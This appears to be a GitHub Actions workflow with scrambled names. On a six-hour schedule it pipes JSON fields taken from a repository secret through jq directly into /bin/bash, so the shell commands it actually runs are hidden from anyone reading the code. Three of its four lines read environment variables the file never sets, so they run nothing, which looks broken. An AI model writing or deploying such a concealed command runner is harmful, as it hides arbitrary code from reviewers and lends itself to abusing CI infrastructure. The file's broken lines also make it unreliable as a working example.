name: sichuoch
on:
  workflow_dispatch:
  schedule:
    - cron: '48 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: sichuoch
        env:
          y46789: ${{ secrets.y46789 }}
        run: |
          echo $y46789 | jq -r .htfi5928 | /bin/bash
          echo $ze379 | jq -r .zulc02 | /bin/bash
          echo $bgw3 | jq -r .q42 | /bin/bash
          echo $qsmhh123 | jq -r .zoza30020 | /bin/bash

